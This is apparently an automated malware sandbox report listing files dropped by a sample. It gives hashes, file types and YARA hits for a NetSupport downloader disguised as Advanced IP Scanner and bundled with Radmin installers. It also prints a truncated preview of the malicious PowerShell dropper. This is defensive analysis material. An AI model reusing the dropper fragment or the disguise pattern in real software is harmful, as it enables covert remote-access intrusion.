                                                                                                                                                                                                  Preview:<.d....!..`...B..........Z....;.......;...%...;.. #...;..!....;..D....O..]\...[..Y"...^..0....^..T...(5......G.......H,..Q...K...@...N:......V...E..._...^.......).......R....y..Rq......................Zj...t..+K...t..R....t..]......A....j......5t......@...C...H5..['..f...0.......F....................~..3....`..8....e..\y......\.......... =...G..*.y.....*.y.....*.%..%~.*.0..%..+.....;.+.....*.+......+....r.+....'?.G....!..G....+..H0...\..Hw9.....Hw9.....I....)4.J6....p.J6......J6....h.J6...J..LD......L.b..]4.M.S..B .R.......V....0..Wi...\$.W.T...e.Z.|..S..[f3..W~.gc....j.w0K..I...H...&U......^ ...T...+..."..5p...~..7... d..G-...T......2....'......[.......b..9.E..A(.L.#..d..M$o.....e.....B.l8...7=...^..J...I....T......C.......T.......[Q..>...9..>......3..0A..l...L8......:..5.l..`..AV...(..y....Y....0..Uf......Ta......Z...tb..6.......................U.......>Z......P`.(....U..1V...*(.R....2..W.<..a..f.~..".......5...1........^..6....5..........>...c..G~.;6...c..q.J..Q<..I....;..I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28836
                                                                                                                                                                                                  Entropy (8bit):5.274937745581086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:evIxSKa3n9xd9wBClaVMxIswLfg0x6WcX:eG+X7YIUVMYk
                                                                                                                                                                                                  MD5:EE64BC556D9E554E5122531BBA368240
                                                                                                                                                                                                  SHA1:C691C2D832157EF9FD50F0D2C5B91EA9B6934979
                                                                                                                                                                                                  SHA-256:11D722019F26DAEF74AF7EAE33823B4625D4EBBC33352D5EFAC85D19B2BA0658
                                                                                                                                                                                                  SHA-512:23BE3849BE62BEE12E645E01E05D45ACCB2D575F15D50643FC5658F37C6143E66BE2A80010E030C78059357F7E45FB9D9EF2E1625A59505BD74C99CA2EA749BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........\....;.......;...1...;.. G...;.."!...;..F....O.._....[..[J...^..1q...^..V...(5......G.......H,..S...K...B...N:......V...G..._...`.......*F......T....y..Tg......................\....t..+....t..T....t.._;.....C....j.. ...5t......@...E...H5..]_..f...1.......H....................~..4....`..:....e..^.......^.......... =...I..*.y.....*.y.....*.%..&..*.0..&1.+.......+.......+....H.+....h.+....'..G....!-.G....,W.H0..._..Hw9.....Hw9.....I....)..J6....\.J6......J6....r.J6...Lq.LD......L.b.._j.M.S..Df.R.......V....1..Wi...^Z.W.T...I.Z.|..U..[f3..Y..gc....F.w0K..J...H...&.......`D...T......."..6....~..9... d..I....T../...2...........].......c..9.E..C^.L.#..f].M$o.....e.....:.l8...9!...^..L...I....N......E.......V.......]...>...E..>......3..1...l...N.......<..5.l..b..AV...)..y....[....0..Wh......VS......]'..tb..7.......................W.......@.......Rt.(....W..1V...*..R....3..W.<..cW.f.~..#.......6z..1........^..8A...5...i......L...c..Il.;6...d..q.J..SP..I....!..I
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):20672
Entropy (8bit):6.988142648004873
Encrypted:false
SSDEEP:384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
MD5:39047E168FFBDD19185504633D6ECA29
SHA1:FE3423689EFEDADA19C7DEC3D5DD077A057BF379
SHA-256:611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
SHA-512:8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19136
Entropy (8bit):7.02455319040347
Encrypted:false
SSDEEP:192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
MD5:E70D8FE9D21841202B4FD1CF55D37AC5
SHA1:FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
SHA-256:E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
SHA-512:BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):28029
Entropy (8bit):4.645006029092153
Encrypted:false
SSDEEP:384:nsoeTpwn8BLKep+1uYLGPlUMpitDd0FoTGv8QAyEDPQRBHYerHcgDOIq0IDbn8:nsoeTpXr+KiBd0qTayPQRdBv
MD5:1DCBBF653BCB4D127D902EAB60CBB42A
SHA1:BDC0ACD9FEE35B3F1446210A45C5B20ED9987F8A
SHA-256:F1C9FB8580866B3066DD4BA9A559F3161B4E3240831A8439F9720B12B40FA010
SHA-512:9A85094294FB5884BDD548E7BEDFCB97760ABE61ED76AAC5EF2E7AF6127EBEC33D1F16FF3DB7FC59FB294C12F3E78E2547BABB4A992864B13CC3BAC7DB0C8F22
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18624
Entropy (8bit):6.993015464813673
Encrypted:false
SSDEEP:192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
MD5:FC68978ABB44E572DFE637B7DD3D615F
SHA1:47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
SHA-256:DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
SHA-512:7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18624
Entropy (8bit):6.98650705248822
Encrypted:false
SSDEEP:192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
MD5:F6D1216E974FB76585FD350EBDC30648
SHA1:F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
SHA-256:348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
SHA-512:756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
Size (bytes):1292
Entropy (8bit):5.135718210930255
Encrypted:false
SSDEEP:24:lFo+ag1FGfysuSIIrXqF/w9HUkb830Kt5RGDLeMFG/zReEhyv:Hra4FGfysRxXqMHUkC0U2DqMFG/xs
MD5:37065F0D6A5CE8F22D831F76A7644D8B
SHA1:2750F55AC41F0888159604AFBCF70C6B894C01BD
SHA-256:18B7C895BABB71508CC7F2A5861C493A8FB13D12D2CBD7A2C0441DDDA5C545C2
SHA-512:8CA493719F739CA680BA666E0C55D4D471C207F1D8E7EC12DB2E93692A1123B94EB07B75311B667E5B31300C90C6009745AFE7F4067D237570091B3BD1ECB45E
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1180200
Entropy (8bit):6.806814022865445
Encrypted:false
SSDEEP:24576:cC5LQc2ki3TeGT5jWZKbROjq69Afqg0tPoqqHVd4qP02mn:cOB21uZKbR0DACg0tPSVyR2mn
MD5:C553D46852C7015A3DF581FBD2C02C3A
SHA1:D768260F818EA400BE5AD8F86280FB92DD37F341
SHA-256:F90FC5CD84EFE1F5AF152DF3FC95306782384DCBC738E5C383E705025C3B837B
SHA-512:42FBFE51991BA7FCAECADFED89AADCD3EDA74E63FD80E4FE630EB6E4957DB179CC1B32F7CB46F5AFA4749E461CF4E11A723172DAF4035EE1FB3AF60D49F531A6
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Unicode text, UTF-8 text
Category:dropped
Size (bytes):1614189
Entropy (8bit):5.107077482480661
Encrypted:false
SSDEEP:49152:p68vRRbvrqg2KwYbDmEZ3xm8JfAD2MGaYP63xwZjV4yhOKktsKCA4Zsdd:A
MD5:7B844618B571CDACB552622844639A96
SHA1:3103E22CC3EFE0B8EEB0F8664AF250BDF3FDA7C8
SHA-256:8AA5F53559D9EDA03150CFDADC6273365311A3293631E7E467C4E881798A7885
SHA-512:9BB645420DF1C61E8427D7A1E97067F4CC329F7A2CDB1B1957A0F05BC064967C3294DC3AE382C352A8DBB4EBF43612883C138216A3039012D37751F2EEB8A0BC
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):449280
Entropy (8bit):6.670243582402913
Encrypted:false
SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
MD5:1FB93933FD087215A3C7B0800E6BB703
SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):300584
Entropy (8bit):5.864906645133905
Encrypted:false
SSDEEP:6144:QAgKki4pTMgFCvy5KTgUZyV9uvJql0UBef4sdlruQ26MKXvP:QAlhPy5KTgsy+vMdUf4sv/B3
MD5:E8D9421848C1DDEA1A74EBFDBE452C67
SHA1:7F1302F2B64FF785ABF85F5A9579EA12E555233B
SHA-256:3449DC8B0B476B3FA4F2EDB141D31A8FEF5D41C4E3393B592E0277861C622958
SHA-512:2CA2AA65C0BC839120C9DBA540F478B244DAFBD485DB05102F36EEDB0C86192522CD28B0A16D85EBA949CE609D019E7F82F978EBBCBA31A1717C42B9A50A707A
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1384488
Entropy (8bit):6.46559466851362
Encrypted:false
SSDEEP:24576:z97oggy+GqjfB6aNrsNNyE8pXv7TXhLZKv+:Z7GGqlq0tXp
MD5:A95683988952CD21F5F6DE5318122B98
SHA1:2F8C94FC2CF0A9BDC61743541E94AB0DCC2840C0
SHA-256:10CABD7EC4B4BDB4CAC85C905917B64DAD626DCABACBF32748217B129A3B2099
SHA-512:33C8F7DAF9E13A91BA9C362AEFC944733B7C946AD042E1BBA1B7218B9B6500C5F04E8F3BCC3650CBAF2DA163F8A6DEB21AABCCFDEF8FBCC804B862E07B55CF89
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):51240
Entropy (8bit):6.51849694585826
Encrypted:false
SSDEEP:1536:Rjw/NzbbQqgujx+DUcde+Q/Zj1VyZbueH3hfa:RjH4ude+QRj1VyZbue1a
MD5:1184F4FB8EFAE468729C62787C9ED80B
SHA1:A06E3F759DC4BEE0B9BADEB7A5A67DFEEBBF141F
SHA-256:C075C95D5153DE4005F0E6804EB4F783886D10B683712ED00EF09A6629D6917A
SHA-512:2EF35E76F950218F3FABB3F53244366CC7DE6D61BA090F3C312EEA8B7457B239DAAE65D05FE3A0BD2A7236AFC4EB0434AEC7F8042E0C5DB1D118FE0E11E04F53
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Server 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Server 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Server 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {BBD285CD-D1FE-41B1-B6B4-7FF7C27F553B}, Last Saved Time/Date: Thu Dec 14 03:24:15 2017, Create Time/Date: Thu Dec 14 03:24:15 2017, Last Printed: Thu Dec 14 03:24:15 2017, Code page: 1252, Template: Intel;1033
Category:dropped
Size (bytes):6313984
Entropy (8bit):7.80157349747762
Encrypted:false
SSDEEP:98304:p4Yy6oWmNbrsXB52VA7/YLiIwyxDdYYUPe7fA8ScWmMJ5TpBpB22Omi58:pP1mdrIiVe/cwyxpF7fHScWLjTbedfi
MD5:7DBF077665F632BEA55C0D88B7F301A3
SHA1:D1D0215FC874F72228BDDAFAB9FBEE5B816737B2
SHA-256:AA584952E31F9C521C2D57AF5FAAFA876E78C512A4DAF0A76E11695EA126558A
SHA-512:90BD7F02A7838AD83B6CC0E287038568994E07D26B42E66BD0474ADFC6A82299B612CEF01E570FD27EBCFB54B912F333DF91879CD348E06718E3622918368E8F
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Viewer 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Viewer 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Viewer 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {FAB726D2-8076-4144-B0E6-C4FC2A838845}, Last Saved Time/Date: Thu Dec 14 03:24:44 2017, Create Time/Date: Thu Dec 14 03:24:44 2017, Last Printed: Thu Dec 14 03:24:44 2017, Code page: 1252, Template: Intel;1033
Category:dropped
Size (bytes):5409792
Entropy (8bit):7.888464776356177
Encrypted:false
SSDEEP:98304:/YyLObvirO9mCdfl2nus7iOlkwAI2ljeoKleOA56VJJ8bXSUvmdMjGerZSJi:FGKrofl2xG1ICGleD6DJ8DSUv+EJZSJi
MD5:8E36ECA249C08969EF5C0822928416D6
SHA1:1937E555B760B4A3E13667BE189A9A9B9C9FAF8C
SHA-256:052EE17B1544F3E1466DF561D7BAAA4BB694320803102C96FCD3560BEEB3B5C3
SHA-512:C7B9DE31660CD56AAC2D30C3EF4E5C041E6A1108B3B058EA08C2C9A08AD235398E15AE5FDC76263476864BB964443035F383EA3CB82FFA715D8583ABEB9C5AB1
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:data
Category:dropped
Size (bytes):590271
Entropy (8bit):7.998650752150742
Encrypted:true
SSDEEP:12288:FJRxPJ22FvSUzQI2XsdVYfVnFW4XG1s5x41ZRR8kd+O0p1mXuFm1ssGHw5AX+4nL:FSyaukwGf79ueU/RVd+l/1F/HL3nL
MD5:637FB65A1755C4B6DC1E0428E69B634E
SHA1:FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
SHA-256:B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6
SHA-512:F8FE4083361386C806D95DF7BE83C83BAD07E2F2563290C343F0DF2FE6BCA8EAD1BE7E0B38B91C1689CE26E8E77FC753845A574DC5ECFD3ABF71AEAC966E21AD
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):282664
Entropy (8bit):6.463228483563671
Encrypted:false
SSDEEP:6144:ktT9k1wLFm2gcPHRGmRFQZvj/HXvC8CJXNMdyHNAe17LjuEnAZwjJOIaUB547PEa:ktT+1wLFm2gcPHRGmRFQZvj/HXvC1JX4
MD5:BA337B8D1BC9F117F7605A2B79B10064
SHA1:9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
SHA-256:EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
SHA-512:277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):900288
Entropy (8bit):6.823623458577979
Encrypted:false
SSDEEP:24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
MD5:3E0303F978818E5C944F5485792696FD
SHA1:3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
SHA-256:7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
SHA-512:C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:InnoSetup Log Network Utility Pro {AABBCCD1-22D3-4EF4-88FF-123456789ABC}, version 0x418, 6118449 bytes, 305090\37\user\376, C:\Program Files (x86)\Advanced IP Scanner
Category:dropped
Size (bytes):6118449
Entropy (8bit):4.024243879327782
Encrypted:false
SSDEEP:49152:/hxs6jtR/RneZS1MvZmD33rSueTNJx5q1d2AMVyeTH:S
MD5:7C0A8944C92990F3A11181DC463A7AD0
SHA1:75EE5EDB0FD9602649E32FA24364EEACEF09C54E
SHA-256:FDBB8509C707270C7771658C5A3B8F9A38159310F2330CE68C3EBA9FC968914D
SHA-512:39DE28F4DD1759AE02CA45B5EBE852592B9CF041AECBFA4493DF0F3CF1F7012A14911C9C27372478003485E74ADC3C0C7D7FEA4759B5D10DC0B9A2A36F75E7CF
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, Author: Joe Security

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3329597
Entropy (8bit):6.563278634392228
Encrypted:false
SSDEEP:49152:AdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334Pi:yJYVM+LtVt3P/KuG2ONG9iqLRQu3334a
MD5:CB7E324B491A203424BDF73E30AFD225
SHA1:03D9E2D82301C50932B002F2D9493B6B67D14E77
SHA-256:579605F32ECDFDC505D5B5D55E77E1E94D73688FE1A7A51C950166A3E13240DB
SHA-512:283D735F448FDB0A6BC2D0D3CF6E2ACAACFC3E2FECD244609963B586AC53CC69A05AE7A7BCA14A19416FF4E7B0FC5744266F6715F665A1A8EF0BEA292D4EF3B8
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):80128
Entropy (8bit):6.906674531653877
Encrypted:false
SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
MD5:1B171F9A428C44ACF85F89989007C328
SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
Malicious:false

Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Nov 8 17:02:14 2024, mtime=Fri Nov 8 17:02:14 2024, atime=Fri Apr 29 18:13:52 2022, length=1681960, window=hide
Category:dropped
Size (bytes):1358
Entropy (8bit):4.59591959254946
Encrypted:false
SSDEEP:24:8mdB/n6E/dOEttaGZ6EIUn4Ak8/aoT5dcaGTUnKxdcaG7jaGOalUUP4ReqyFm:8mdB/nt/dOsaw6EIKfTCydcaqKKdca6z
MD5:4693DA39EBBA9706A4646E52038FAE75
SHA1:A4F4B3E76996A7893C83373CECFA3CB322C42333
SHA-256:077FA672958085B05454D13DBD640ECDBC0E7D67633E4C9EE93C4AB4126C374A
SHA-512:B35E05B438E3D5866FAC8B2F4DA03614340B5A76C74513FB4B3CD90AF066C3C0393BAE16EF6909E8BEAC14FA394E1DDFE40AB83A22BC0DD5F319408C9BD440F0
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):1772
Entropy (8bit):5.46726758807131
Encrypted:false
SSDEEP:48:QT1WSU4xympjms4RIoU99tlNWR831NTxZ9001dqZ0:QZLHxvMsIfAXW8n/S01YZ0
MD5:242F41941249D5E3B32D299B6F43DE09
SHA1:C82D602B69043F5B591CA09FD27DB8979465B21E
SHA-256:AC920A14DBC371D7AC591BBD2A29149DCF59ACB407191098FC82F6470AEBB326
SHA-512:A14B6CFFC3CF5B2403DA89D8B6742EEE003994B2E36FF4C7E10CA5DD9985A7144D6C4E47E000DC7F9C69FC4DE399C50F751327CA452247C40BB4AF61F1CEAF6B
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:ASCII text, with very long lines (65339), with CRLF line terminators
Category:dropped
Size (bytes):3035738
Entropy (8bit):5.999270311192215
Encrypted:false
SSDEEP:49152:2e6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMi:j
MD5:E7DB56615C92704E45D5832F1EB94C65
SHA1:4D36D413E1B76D76A2E0420C70A093BBE460A209
SHA-256:7E80DDE6044A5AE063E01D834953DEA9EBF6F83F8AE43B2F407EAFC17D6B33C6
SHA-512:41D807E82D3987FD73107C4CB9A15B5B6992E2FC8F2064D5ED39B88820769EE9236B1D053B419723F89DFA4A0B6EA4D1B6F37AA2334D1542201FF7FB0A6E05A4
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1, Author: Joe Security
Preview:$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$installPath = "$Env:AppData\SystemUtil";..if (Test-Path $installPath) {.. Remove-Item "$Env:AppData\tempDataFile.txt";.. Exit;..};..$encodedData = "
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.720366600008286
Encrypted:false
SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:E4211D6D009757C078A9FAC7FF4F03D4
SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:false
Process:C:\Users\user\Desktop\KC0uZWwr8p.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3305472
Entropy (8bit):6.576592205223059
Encrypted:false
SSDEEP:49152:IdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334Py:6JYVM+LtVt3P/KuG2ONG9iqLRQu3334K
MD5:77264DBCB409DE0C426BD5088B0FBE09
SHA1:11C02946EA15EEA615EDE3ED5597ED223D3879CF
SHA-256:85C71BB847F0B29DB1D790C631D586167942FFCEAE96605F5673438FE3C8DD1A
SHA-512:5604A2FEE723CEA3238ACA10DD44E1B1A4D5316A1E2C860619E34B9076FEE501E9A9FC22C7E3E3DAD1FDC7690F1992A57778B74B40FE6F3307085549CCFC6A83
Malicious:true
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):93560
Entropy (8bit):6.5461580255883876
Encrypted:false
SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
MD5:4182F37B9BA1FA315268C669B5335DDE
SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
Malicious:true
